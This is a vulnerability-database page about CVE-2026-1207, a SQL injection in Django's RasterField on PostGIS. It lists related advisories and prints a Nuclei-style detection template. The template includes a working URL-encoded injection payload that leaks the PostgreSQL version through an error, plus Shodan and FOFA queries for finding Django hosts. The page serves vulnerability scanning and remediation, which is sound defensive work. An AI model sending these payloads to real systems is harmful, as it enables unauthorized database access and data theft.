| Reporter | Title | Published | Views | Family All 119 |
|---|---|---|---|---|
| Exploit for SQL Injection in Djangoproject Django | 26 Apr 202602:54 | – | githubexploit | |
| CVE-2026-1207 | 3 Feb 202614:35 | – | attackerkb | |
| CVE-2026-1207 | 3 Feb 202614:35 | – | alpinelinux | |
| The vulnerability of the Django web application framework lies in its lack of protection for SQL query structures, allowing attackers to execute arbitrary code. | 23 Mar 202600:00 | – | bdu_fstec | |
| CVE-2026-1207 vulnerabilities | 5 Feb 202601:17 | – | cgr | |
| CVE-2026-1207 | 3 Feb 202615:53 | – | circl | |
| Django 安全漏洞 | 3 Feb 202600:00 | – | cnnvd | |
| CVE-2026-1207 | 3 Feb 202614:35 | – | cve | |
| CVE-2026-1207 Potential SQL injection via raster lookups on PostGIS | 3 Feb 202614:35 | – | cvelist | |
| [SECURITY] [DLA 4484-1] python-django security update | 19 Feb 202619:46 | – | debian |
id: CVE-2026-1207
info:
name: Django RasterField - SQL Injection
author: omarkurt
severity: high
description: |
Django < 6.0.2, < 5.2.11, and < 4.2.28 contains a SQL injection caused by improper sanitization of the band index parameter in RasterField on PostGIS, letting remote attackers inject SQL, exploit requires crafted input.
impact: |
Remote attackers can execute arbitrary SQL commands, potentially leading to data disclosure or modification.
remediation: |
Upgrade to versions 6.0.2, 5.2.11, 4.2.28 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2026-1207
- https://www.djangoproject.com/weblog/2026/feb/03/security-releases/
- https://github.com/django/django/commit/81aa5292967cd09319c45fe2c1a525ce7b6684d8
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
cvss-score: 8.1
cve-id: CVE-2026-1207
epss-score: 0.09436
epss-percentile: 0.9482
cwe-id: CWE-89
cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: djangoproject
product: django
shodan-query: 'django'
fofa-query: 'app="Django"'
tags: cve,cve2026,django,sqli,postgis,rasterfield,vuln,unauth,vkev
http:
- method: GET
path:
- "{{BaseURL}}/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--"
- "{{BaseURL}}/api/raster/search/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 500'
- 'contains_all(body, "invalid input syntax for type integer", "PostgreSQL")'
condition: and
extractors:
- type: regex
name: postgres_version
part: body
group: 1
regex:
- 'PostgreSQL ([0-9]+\.[0-9]+)'
# digest: 490a004630440220319d9cab5074ff6ab10e4cef1126a49cc1167d6fd7d65028f3de18d06675420602202b406dc99ad5f11858f09b3540e6db6d552f759178b0500ecb039e42b76f8422:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation